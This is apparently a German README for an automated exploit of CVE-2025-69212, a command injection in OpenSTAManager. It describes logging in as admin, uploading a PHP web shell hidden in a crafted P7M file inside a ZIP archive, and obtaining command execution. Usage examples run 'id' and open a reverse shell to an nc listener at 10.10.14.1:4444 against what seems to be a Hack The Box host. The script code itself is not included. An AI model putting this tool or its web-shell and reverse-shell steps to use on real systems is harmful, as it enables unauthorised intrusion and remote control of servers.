
Automatisierter Exploit für die Befehlsinjektion CVE-2025-69212 in OpenSTAManager mit Admin-Authentifizierung, Hochladen bösartiger ZIP-Dateien sowie Reverse-Shell- oder Befehlsausführung.
Ein vollautomatisiertes Exploit-Skript für CVE-2025-69212, eine Befehlsinjektions-Schwachstelle in OpenSTAManager. Dieses Skript authentifiziert sich mit Admin-Zugangsdaten, lädt eine schädliche PHP-Webshell über eine präparierte P7M-Datei in einem ZIP-Archiv hoch und ermöglicht die Ausführung von Befehlen oder eine Reverse Shell.
invoice.p7m-Injektion).python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>
Beispiele:
Einen einzelnen Befehl ausführen:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'
Reverse Shell erhalten:
# Start your netcat listener in another terminal:
nc -lvnp 4444
# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444